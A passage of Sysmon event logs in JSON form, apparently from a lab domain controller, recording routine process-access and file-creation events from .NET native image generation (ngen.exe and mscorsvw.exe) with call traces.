C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:31.997","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FF-5F25-0000-0010BAEB1200}","TargetProcessId":"4932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:32","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:32.215\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0500-5F25-0000-001013EF1200}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:32.215","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0500-5F25-0000-001013EF1200}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:32","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:32.215\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0500-5F25-0000-001013EF1200}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:32.215","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0500-5F25-0000-001013EF1200}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:32","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:32.215\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0500-5F25-0000-001013EF1200}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:32.215","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0500-5F25-0000-001013EF1200}","TargetProcessId":"656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:36.981\r\nProcessGuid: {A837DB8D-0500-5F25-0000-001013EF1200}\r\nProcessId: 656\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\290-0\\System.dll\r\nCreationUtcTime: 2020-08-01 06:00:36.981","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:36.981","ProcessGuid":"{A837DB8D-0500-5F25-0000-001013EF1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\290-0\\System.dll","CreationUtcTime":"2020-08-01 06:00:36.981","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:37.419\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-001083F41200}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:37.419","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-001083F41200}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:37.419\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-001083F41200}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:37.419","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-001083F41200}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:37.419\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-001083F41200}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:37.419","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0505-5F25-0000-001083F41200}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:37.684\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0505-5F25-0000-00101FF81200}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 